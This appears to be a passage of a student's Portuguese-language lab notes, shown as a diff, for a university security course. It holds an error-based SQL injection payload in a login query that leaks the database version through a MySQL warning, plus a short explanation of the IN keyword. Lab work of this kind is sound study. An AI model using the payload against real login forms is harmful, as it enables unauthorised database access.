marco-almeida/LECI/SIO/guiao01/README.md

 SELECT * FROM users where username='' or 1 in (select @@version) -- //' AND password = '.md5($password)."'
 ```

+> Eis como funciona a keyword *in* em SQL: ```SELECT * FROM Customers WHERE Country IN ('Germany', 'France', 'UK')``` Resulta da query todos os costumers de alemanha, frança e UK.
+Logo o IN é tipo um OR multiplo

 Aparece na página o seguinte erro:
 > Warning: 1292: Truncated incorrect DOUBLE value: '8.0.17'